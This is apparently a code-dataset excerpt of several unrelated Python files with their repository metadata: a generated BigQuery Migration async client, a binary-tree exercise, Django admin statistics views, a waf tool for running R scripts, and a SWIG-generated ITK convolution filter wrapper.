"the individual field arguments should be set."
)
request = migration_service.DeleteMigrationWorkflowRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.delete_migration_workflow,
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
async def start_migration_workflow(
self,
request: Optional[
Union[migration_service.StartMigrationWorkflowRequest, dict]
] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> None:
r"""Starts a previously created migration workflow. I.e.,
the state transitions from DRAFT to RUNNING. This is a
no-op if the state is already RUNNING. An error will be
signaled if the state is anything other than DRAFT or
RUNNING.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import bigquery_migration_v2
async def sample_start_migration_workflow():
# Create a client
client = bigquery_migration_v2.MigrationServiceAsyncClient()
# Initialize request argument(s)
request = bigquery_migration_v2.StartMigrationWorkflowRequest(
name="name_value",
)
# Make the request
await client.start_migration_workflow(request=request)
Args:
request (Optional[Union[google.cloud.bigquery_migration_v2.types.StartMigrationWorkflowRequest, dict]]):
The request object. A request to start a previously
created migration workflow.
name (:class:`str`):
Required. The unique identifier for the migration
workflow. Example:
``projects/123/locations/us/workflows/1234``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = migration_service.StartMigrationWorkflowRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.start_migration_workflow,
default_retry=retries.Retry(
initial=1.0,
maximum=10.0,
multiplier=1.3,
predicate=retries.if_exception_type(
core_exceptions.ServiceUnavailable,
),
deadline=60.0,
),
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
async def get_migration_subtask(
self,
request: Optional[
Union[migration_service.GetMigrationSubtaskRequest, dict]
] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> migration_entities.MigrationSubtask:
r"""Gets a previously created migration subtask.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import bigquery_migration_v2
async def sample_get_migration_subtask():
# Create a client
client = bigquery_migration_v2.MigrationServiceAsyncClient()
# Initialize request argument(s)
request = bigquery_migration_v2.GetMigrationSubtaskRequest(
name="name_value",
)
# Make the request
response = await client.get_migration_subtask(request=request)
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.bigquery_migration_v2.types.GetMigrationSubtaskRequest, dict]]):
The request object. A request to get a previously created
migration subtasks.
name (:class:`str`):
Required. The unique identifier for the migration
subtask. Example:
``projects/123/locations/us/workflows/1234/subtasks/543``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.bigquery_migration_v2.types.MigrationSubtask:
A subtask for a migration which
carries details about the configuration
of the subtask. The content of the
details should not matter to the end
user, but is a contract between the
subtask creator and subtask worker.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = migration_service.GetMigrationSubtaskRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.get_migration_subtask,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def list_migration_subtasks(
self,
request: Optional[
Union[migration_service.ListMigrationSubtasksRequest, dict]
] = None,
*,
parent: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListMigrationSubtasksAsyncPager:
r"""Lists previously created migration subtasks.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import bigquery_migration_v2
async def sample_list_migration_subtasks():
# Create a client
client = bigquery_migration_v2.MigrationServiceAsyncClient()
# Initialize request argument(s)
request = bigquery_migration_v2.ListMigrationSubtasksRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_migration_subtasks(request=request)
# Handle the response
async for response in page_result:
print(response)
Args:
request (Optional[Union[google.cloud.bigquery_migration_v2.types.ListMigrationSubtasksRequest, dict]]):
The request object. A request to list previously created
migration subtasks.
parent (:class:`str`):
Required. The migration task of the subtasks to list.
Example: ``projects/123/locations/us/workflows/1234``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.bigquery_migration_v2.services.migration_service.pagers.ListMigrationSubtasksAsyncPager:
Response object for a ListMigrationSubtasks call.
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = migration_service.ListMigrationSubtasksRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.list_migration_subtasks,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# This method is paged; wrap the response in a pager, which provides
# an `__aiter__` convenience method.
response = pagers.ListMigrationSubtasksAsyncPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
async def __aenter__(self) -> "MigrationServiceAsyncClient":
return self
async def __aexit__(self, exc_type, exc, tb):
await self.transport.close()
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=package_version.__version__
)
__all__ = ("MigrationServiceAsyncClient",)
| [
"noreply@github.com"
] | googleapis.noreply@github.com |
c7573c8fd33eebb4c2a6f73f64ce8b8f96b3a533 | 80d02d14744e759d34646e18565f40753685eab7 | /10.doubleTree.py | 05f2c85736220c2dcfc2cc6201b49a8e0f63192d | [] | no_license | ArunRamachandran/BinaryTree-Python | b247e0abc8a8d97d20b3cfa08652dd760607db97 | ef76f3cd43e48250db21cbd6a4d805a848221ccb | refs/heads/master | 2021-01-25T08:42:53.933600 | 2015-01-11T12:06:17 | 2015-01-11T12:06:17 | 29,001,483 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 914 | py | """ Python code to implement a doubleTree fn """
class Node :
"""Node of a Tree"""
def __init__(self) :
self.data = None
self.left = None
self.right= None
def Build(head) :
head.data = 2
x = [1,3]
new_left = Node()
new_left.data = 1
head.left = new_left
new_right = Node()
new_right.data = 3
head.right = new_right
return head
def printTree(head) :
if head == None:
return
else :
print "Data : %d" % (head.data)
printTree(head.left)
printTree(head.right)
def NewNode(obj) :
new = Node()
new.data = obj
new.left = None
new.right= None
return new
def doubleTree(head) :
if head == None:
return
else :
temp = Node()
doubleTree(head.left)
doubleTree(head.right)
temp = head.left
head.left = NewNode(head.data)
head.left.left = temp
head = Node()
head = Build(head)
print "Present Tree "
printTree(head)
doubleTree(head)
print "After doubling "
printTree(head)
| [
"arunkramachandran92@gmail.com"
] | arunkramachandran92@gmail.com |
257ab21f25ff3348d9736148b96f22450be75acd | 7c2c1f8eb08e998cb810481f1dbbbc994f175611 | /meiduo_mall/meiduo_mall/apps/meiduo_admin/views/statistical.py | 694a93c08c7baa16538ca6945c21598d92728570 | [] | no_license | 1584881047/meiduo | 14e65652032aa83fec5347ade7e242b98ab1531b | 4176c3cc615184e50e11e9381fff99972060f1d0 | refs/heads/master | 2022-12-16T10:52:28.760013 | 2019-09-16T00:14:55 | 2019-09-16T00:14:55 | 207,760,356 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,340 | py | from django.utils import timezone
from rest_framework.permissions import IsAdminUser
from rest_framework.response import Response
from rest_framework.views import APIView
from goods.models import GoodsVisitCount
from meiduo_admin.serializers.statistical import GoodsVisitSerializer
from users.models import User
class UserTotalCountView(APIView):
# 添加权限校验
permission_classes = [IsAdminUser]
def get(self, request):
"""
获取用户数量
:param request:
:return:
"""
count = User.objects.count()
return Response({
'date': timezone.now(),
'count': count
})
class UserDayIncrementView(APIView):
# 添加权限校验
permission_classes = [IsAdminUser]
def get(self, request):
"""
获取今日用户访问数量
:param request:
:return:
"""
now_time = timezone.now().replace(hour=0, minute=0, second=0, microsecond=0)
# 用户创建时间大于等于 今天的0点
count = User.objects.filter(date_joined__gte=now_time).count()
return Response({
'date': timezone.now(),
'count': count
})
class UserDayActiveView(APIView):
# 添加权限校验
permission_classes = [IsAdminUser]
def get(self, request):
"""
今日活跃用户
:param request:
:return:
"""
now_time = timezone.now().replace(hour=0, minute=0, second=0, microsecond=0)
count = User.objects.filter(last_login__gte=now_time).count()
return Response({
'date': timezone.now(),
'count': count
})
class UserDayOrdersView(APIView):
# 添加权限校验
permission_classes = [IsAdminUser]
def get(self, request):
"""获取今日下单用户数量"""
now_date = timezone.now().replace(hour=0, minute=0, second=0, microsecond=0)
# 订单创建的时间 >= 今天 的用户 去重 的数量
count = User.objects.filter(orders__create_time__gte=now_date).distinct().count()
return Response({
'date': timezone.now(),
'count': count
})
class UserMonthCountView(APIView):
# 添加权限校验
permission_classes = [IsAdminUser]
# 获取30天日增长用户
def get(self, request):
now_date = timezone.now().replace(hour=0, minute=0, second=0, microsecond=0)
# 开始时间
begin_data = now_date - timezone.timedelta(days=29)
data_list = []
while begin_data <= now_date:
count = User.objects.filter(date_joined__gte=begin_data,
date_joined__lt=begin_data + timezone.timedelta(days=1)).count()
data_list.append({
'count': count,
'date': begin_data.date()
})
begin_data += timezone.timedelta(days=1)
return Response(data_list)
class GoodsDayView(APIView):
permission_classes = [IsAdminUser]
# 日分类商品访问量
def get(self, request):
now_time = timezone.now().date()
goods_visit = GoodsVisitCount.objects.filter(date=now_time)
serializer = GoodsVisitSerializer(goods_visit, many=True)
return Response(serializer.data)
| [
"lixiaoweiai@126.com"
] | lixiaoweiai@126.com |
4fcb27cb9a283d949398d1f36fbe1e675f64b82c | eb0914b92cd4ecc32d311e94dd48126fa0be13e7 | /.mywaflib/waflib/extras/run_r_script.py | bb3c3f68ad352d1a64a75827493bb7b4823d2ceb | [
"BSD-3-Clause"
] | permissive | livioferrante/my-final-project | 1d937c2b020120da42dee4f7150ef37979e752bd | f3d082173c7c38e69905e49c9a544d3cc75ad172 | refs/heads/master | 2020-05-17T11:55:14.948417 | 2014-12-15T20:15:18 | 2014-12-15T20:15:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,830 | py | #!/usr/bin/env python
# encoding: utf-8
# Hans-Martin von Gaudecker, 2012-13
"""
Run a R script in the directory specified by **ctx.bldnode**.
Strings supplied to the **prepend** and **append** keywords will be
added to the command line.
Usage::
ctx(
features='run_r_script',
source='some_script.r',
target=['some_table.tex', 'some_figure.eps'],
deps='some_data.csv',
append='',
prepend=''
)
"""
from waflib import Task, TaskGen, Logs
R_COMMANDS = ['RScript', 'Rscript']
def configure(ctx):
ctx.find_program(
R_COMMANDS,
var='RCMD',
errmsg="""\n
No R executable found!\n\n
If R is needed:\n
1) Check the settings of your system path.
2) Note we are looking for R executables called: %s
If yours has a different name, please report to hmgaudecker [at] gmail\n
Else:\n
Do not load the 'run_r_script' tool in the main wscript.\n\n"""
% R_COMMANDS
)
ctx.env.RFLAGS = ''
@Task.update_outputs
class run_r_script(Task.Task):
"""Run a R script."""
run_str = '${PREPEND} "${RCMD}" ${RFLAGS} "${SRC[0].abspath()}" ${APPEND}'
shell = True
def exec_command(self, cmd, **kw):
bld = self.generator.bld
try:
if not kw.get('cwd', None):
kw['cwd'] = bld.cwd
except AttributeError:
bld.cwd = kw['cwd'] = bld.variant_dir
if not self.buffer_output:
kw["stdout"] = kw["stderr"] = None
return bld.exec_command(cmd, **kw)
def keyword(self):
"""
Override the 'Compiling' default.
"""
return 'Running'
def __str__(self):
"""
More useful output.
"""
return "{prepend} [R] {rflags} {fn} {append}".format(
prepend=self.env.PREPEND,
rflags=self.env.RFLAGS,
fn=self.inputs[0].path_from(self.inputs[0].ctx.launch_node()),
append=self.env.APPEND
)
@TaskGen.feature('run_r_script')
@TaskGen.before_method('process_source')
def apply_run_r_script(tg):
"""Task generator customising the options etc. to call R in batch
mode for running a R script.
"""
# Convert sources and targets to nodes
src_node = tg.path.find_resource(tg.source)
tgt_nodes = [tg.path.find_or_declare(t) for t in tg.to_list(tg.target)]
tsk = tg.create_task('run_r_script', src=src_node, tgt=tgt_nodes)
tsk.env.APPEND = getattr(tg, 'append', '')
tsk.env.PREPEND = getattr(tg, 'prepend', '')
tsk.buffer_output = getattr(tg, 'buffer_output', True)
# dependencies (if the attribute 'deps' changes, trigger a recompilation)
for x in tg.to_list(getattr(tg, 'deps', [])):
node = tg.path.find_resource(x)
if not node:
tg.bld.fatal(
'Could not find dependency %r for running %r'
% (x, src_node.relpath())
)
else:
tsk.dep_nodes.append(node)
Logs.debug(
'deps: found dependencies %r for running %r' % (
tsk.dep_nodes, src_node.relpath())
)
# Bypass the execution of process_source by setting the source to an empty
# list
tg.source = []
| [
"livio.ferrante@tiscali.it"
] | livio.ferrante@tiscali.it |
4b889b9c80962f87dfe883a127fa04e50504a1fa | 46b432cd3557038c454601367b878f889c9b6a8f | /hShibata/tutorial03/test.py | e365b536df8fa200f4ac722f0e7e91dd5ca53031 | [] | no_license | tmu-nlp/NLPtutorial2019 | 84ceec06568fd9d899a686658fb8851466133375 | d77d199c50cd37d70e462209a7bfcd4dee9140a1 | refs/heads/master | 2020-05-14T13:34:05.336594 | 2019-09-25T02:25:41 | 2019-09-25T02:25:41 | 181,814,723 | 1 | 0 | null | 2019-08-01T18:53:54 | 2019-04-17T04:04:06 | Python | UTF-8 | Python | false | false | 1,287 | py |
print("hello")
# the test to change value of dictionary in for loop by smart way. We need this test to implement a method which builds n-gram using a recursive function.
myDict = {}
myDict[0] = 3
myDict[1] = 3
for key, val in myDict.items():
val = 0
print(myDict) # output is {0: 3, 1: 3}. So we cannot.
for key, val in myDict.items():
myDict[key] = 99
print(myDict) # output is {0: {2: 2}, 1: {2: 2}}. So we can by this way, which re reference using key, as we know well.
class tClass:
def __init__(self):
self.a = 0
# next we will shows to change the member value of a class using for loop.
for key, val in myDict.items():
myDict[key] = tClass() # first, initialize all value as a class.
for key, val in myDict.items():
val.a = 99 # then we can change its member, while we could not for an ordinal value type such as number.
for key, val in myDict.items():
print(key, val.a)
# output is 0 99\n 1 99. So this is possible. We can know that python3 is implemented to pass a reference of a dictionary value on the for loop, if it is a class.
# the below example test whether the next syntax is recognized correctly.
def call(ins: tClass):
print(ins.a)
for key, val in myDict.items():
call(val)
# the output is 99\n 99. So this works. | [
"smithakihide1992@gmail.com"
] | smithakihide1992@gmail.com |
31a3ad2735b2a2f377105bc4cc2c2522e2f60037 | cc0c0f99a5cf563ff52a76f2ac17cdad09d22f01 | /venv/Lib/site-packages/itk/itkConvolutionImageFilterBasePython.py | d6fead69072bd45c72db67ef950ec1ad03029b09 | [] | no_license | Marxss/carck_detect_system | 9c0d338bde322b4c7304fd0addb524d8697c8a7b | d2480f2108052af8af0aa5265a5239c309885043 | refs/heads/master | 2022-04-15T23:34:20.988335 | 2020-03-29T16:24:00 | 2020-03-29T16:24:00 | 214,625,168 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 73,002 | py | # This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.8
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
# Select SWIG's instancemethod factory: Python 3 uses the C helper exposed by
# the extension module; Python 2 used the (since-removed) 'new' module.
if version_info >= (3, 0, 0):
    new_instancemethod = lambda func, inst, cls: _itkConvolutionImageFilterBasePython.SWIG_PyInstanceMethod_New(func)
else:
    from new import instancemethod as new_instancemethod
if version_info >= (2, 6, 0):
    def swig_import_helper():
        # Locate the compiled extension in this file's own directory first,
        # so the matching build is loaded even if another copy is on sys.path.
        from os.path import dirname
        import imp
        fp = None
        try:
            fp, pathname, description = imp.find_module('_itkConvolutionImageFilterBasePython', [dirname(__file__)])
        except ImportError:
            # Not found next to this file: fall back to a regular import.
            import _itkConvolutionImageFilterBasePython
            return _itkConvolutionImageFilterBasePython
        if fp is not None:
            try:
                _mod = imp.load_module('_itkConvolutionImageFilterBasePython', fp, pathname, description)
            finally:
                # Always close the file handle returned by find_module.
                fp.close()
            return _mod
    _itkConvolutionImageFilterBasePython = swig_import_helper()
    del swig_import_helper
else:
    import _itkConvolutionImageFilterBasePython
del version_info
try:
    _swig_property = property
except NameError:
    pass  # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if (name == "thisown"):
return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if (not static):
object.__setattr__(self, name, value)
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
    # Non-static variant: names without a registered C-level setter become
    # plain instance attributes instead of raising AttributeError.
    return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr_nondynamic(self, class_type, name, static=1):
if (name == "thisown"):
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
if (not static):
return object.__getattr__(self, name)
else:
raise AttributeError(name)
def _swig_getattr(self, class_type, name):
    # Static variant: unresolved names always raise AttributeError.
    return _swig_getattr_nondynamic(self, class_type, name, 0)
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except Exception:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
    # New-style classes are available: use 'object' as the proxy base.
    _object = object
    _newclass = 1
except AttributeError:
    # Very old Python without new-style classes: use a classic dummy base.
    class _object:
        pass
    _newclass = 0
def _swig_setattr_nondynamic_method(set):
def set_attr(self, name, value):
if (name == "thisown"):
return self.this.own(value)
if hasattr(self, name) or (name == "this"):
set(self, name, value)
else:
raise AttributeError("You cannot add attributes to %s" % self)
return set_attr
import ITKCommonBasePython
import pyBasePython
import itkImageBoundaryConditionPython
import itkOffsetPython
import itkSizePython
import itkImagePython
import itkPointPython
import vnl_vector_refPython
import stdcomplexPython
import vnl_vectorPython
import vnl_matrixPython
import itkVectorPython
import itkFixedArrayPython
import itkMatrixPython
import vnl_matrix_fixedPython
import itkCovariantVectorPython
import itkSymmetricSecondRankTensorPython
import itkImageRegionPython
import itkIndexPython
import itkRGBPixelPython
import itkRGBAPixelPython
import itkImageToImageFilterAPython
import itkImageSourcePython
import itkImageSourceCommonPython
import itkVectorImagePython
import itkVariableLengthVectorPython
import itkImageToImageFilterCommonPython
# Module-level convenience factories; each simply forwards to the
# corresponding wrapper class's New() static factory method.
def itkConvolutionImageFilterBaseIF3IF3_New():
    """Return a new itkConvolutionImageFilterBaseIF3IF3 via its New() factory."""
    return itkConvolutionImageFilterBaseIF3IF3.New()
def itkConvolutionImageFilterBaseIF2IF2_New():
    """Return a new itkConvolutionImageFilterBaseIF2IF2 via its New() factory."""
    return itkConvolutionImageFilterBaseIF2IF2.New()
def itkConvolutionImageFilterBaseIUS3IUS3_New():
    """Return a new itkConvolutionImageFilterBaseIUS3IUS3 via its New() factory."""
    return itkConvolutionImageFilterBaseIUS3IUS3.New()
def itkConvolutionImageFilterBaseIUS2IUS2_New():
    """Return a new itkConvolutionImageFilterBaseIUS2IUS2 via its New() factory."""
    return itkConvolutionImageFilterBaseIUS2IUS2.New()
def itkConvolutionImageFilterBaseIUC3IUC3_New():
    """Return a new itkConvolutionImageFilterBaseIUC3IUC3 via its New() factory."""
    return itkConvolutionImageFilterBaseIUC3IUC3.New()
def itkConvolutionImageFilterBaseIUC2IUC2_New():
    """Return a new itkConvolutionImageFilterBaseIUC2IUC2 via its New() factory."""
    return itkConvolutionImageFilterBaseIUC2IUC2.New()
def itkConvolutionImageFilterBaseISS3ISS3_New():
    """Return a new itkConvolutionImageFilterBaseISS3ISS3 via its New() factory."""
    return itkConvolutionImageFilterBaseISS3ISS3.New()
def itkConvolutionImageFilterBaseISS2ISS2_New():
    """Return a new itkConvolutionImageFilterBaseISS2ISS2 via its New() factory."""
    return itkConvolutionImageFilterBaseISS2ISS2.New()
class itkConvolutionImageFilterBaseIF2IF2(itkImageToImageFilterAPython.itkImageToImageFilterIF2IF2):
    """Proxy of C++ itkConvolutionImageFilterBaseIF2IF2 class.

    SWIG-generated wrapper for the base of ITK convolution image filters on
    2-D float images; every method below delegates to the compiled
    _itkConvolutionImageFilterBasePython extension module.
    """
    # 'thisown' reflects whether Python owns (and may delete) the C++ object.
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    def __init__(self, *args, **kwargs):
        # Direct construction is disabled; instances come from the New() factory.
        raise AttributeError("No constructor defined")
    __repr__ = _swig_repr
    def SetBoundaryCondition(self, _arg: 'itkImageBoundaryConditionIF2') -> "void":
        """SetBoundaryCondition(itkConvolutionImageFilterBaseIF2IF2 self, itkImageBoundaryConditionIF2 _arg)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_SetBoundaryCondition(self, _arg)
    def GetBoundaryCondition(self) -> "itkImageBoundaryConditionIF2 *":
        """GetBoundaryCondition(itkConvolutionImageFilterBaseIF2IF2 self) -> itkImageBoundaryConditionIF2"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_GetBoundaryCondition(self)
    def SetKernelImage(self, _arg: 'itkImageF2') -> "void":
        """SetKernelImage(itkConvolutionImageFilterBaseIF2IF2 self, itkImageF2 _arg)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_SetKernelImage(self, _arg)
    def GetKernelImage(self) -> "itkImageF2 const *":
        """GetKernelImage(itkConvolutionImageFilterBaseIF2IF2 self) -> itkImageF2"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_GetKernelImage(self)
    def SetNormalize(self, _arg: 'bool const') -> "void":
        """SetNormalize(itkConvolutionImageFilterBaseIF2IF2 self, bool const _arg)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_SetNormalize(self, _arg)
    def GetNormalize(self) -> "bool":
        """GetNormalize(itkConvolutionImageFilterBaseIF2IF2 self) -> bool"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_GetNormalize(self)
    def NormalizeOn(self) -> "void":
        """NormalizeOn(itkConvolutionImageFilterBaseIF2IF2 self)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_NormalizeOn(self)
    def NormalizeOff(self) -> "void":
        """NormalizeOff(itkConvolutionImageFilterBaseIF2IF2 self)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_NormalizeOff(self)
    # Enum values for OutputRegionModeType (see SetOutputRegionMode below).
    SAME = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_SAME
    VALID = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_VALID
    def SetOutputRegionMode(self, _arg: 'itkConvolutionImageFilterBaseIF2IF2::OutputRegionModeType const') -> "void":
        """SetOutputRegionMode(itkConvolutionImageFilterBaseIF2IF2 self, itkConvolutionImageFilterBaseIF2IF2::OutputRegionModeType const _arg)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_SetOutputRegionMode(self, _arg)
    def GetOutputRegionMode(self) -> "itkConvolutionImageFilterBaseIF2IF2::OutputRegionModeType":
        """GetOutputRegionMode(itkConvolutionImageFilterBaseIF2IF2 self) -> itkConvolutionImageFilterBaseIF2IF2::OutputRegionModeType"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_GetOutputRegionMode(self)
    def SetOutputRegionModeToSame(self) -> "void":
        """SetOutputRegionModeToSame(itkConvolutionImageFilterBaseIF2IF2 self)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_SetOutputRegionModeToSame(self)
    def SetOutputRegionModeToValid(self) -> "void":
        """SetOutputRegionModeToValid(itkConvolutionImageFilterBaseIF2IF2 self)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_SetOutputRegionModeToValid(self)
    # Bound C-level destructor invoked by SWIG when the proxy is collected.
    __swig_destroy__ = _itkConvolutionImageFilterBasePython.delete_itkConvolutionImageFilterBaseIF2IF2
    def cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseIF2IF2 *":
        """cast(itkLightObject obj) -> itkConvolutionImageFilterBaseIF2IF2"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_cast(obj)
    cast = staticmethod(cast)
    def New(*args, **kargs):
        """New() -> itkConvolutionImageFilterBaseIF2IF2

        Create a new object of the class itkConvolutionImageFilterBaseIF2IF2 and set the input and the parameters if some
        named or non-named arguments are passed to that method.

        New() tries to assign all the non named parameters to the input of the new objects - the
        first non named parameter in the first input, etc.

        The named parameters are used by calling the method with the same name prefixed by 'Set'.

        Ex:

          itkConvolutionImageFilterBaseIF2IF2.New( reader, Threshold=10 )

        is (most of the time) equivalent to:

          obj = itkConvolutionImageFilterBaseIF2IF2.New()
          obj.SetInput( 0, reader.GetOutput() )
          obj.SetThreshold( 10 )
        """
        # __New_orig__ is attached to this class by the swigregister call below.
        obj = itkConvolutionImageFilterBaseIF2IF2.__New_orig__()
        import itkTemplate
        itkTemplate.New(obj, *args, **kargs)
        return obj
    New = staticmethod(New)
# Rebind each proxy method as a direct instancemethod on the wrapper class
# (SWIG runtime plumbing), then register the class with the C extension.
itkConvolutionImageFilterBaseIF2IF2.SetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_SetBoundaryCondition, None, itkConvolutionImageFilterBaseIF2IF2)
itkConvolutionImageFilterBaseIF2IF2.GetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_GetBoundaryCondition, None, itkConvolutionImageFilterBaseIF2IF2)
itkConvolutionImageFilterBaseIF2IF2.SetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_SetKernelImage, None, itkConvolutionImageFilterBaseIF2IF2)
itkConvolutionImageFilterBaseIF2IF2.GetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_GetKernelImage, None, itkConvolutionImageFilterBaseIF2IF2)
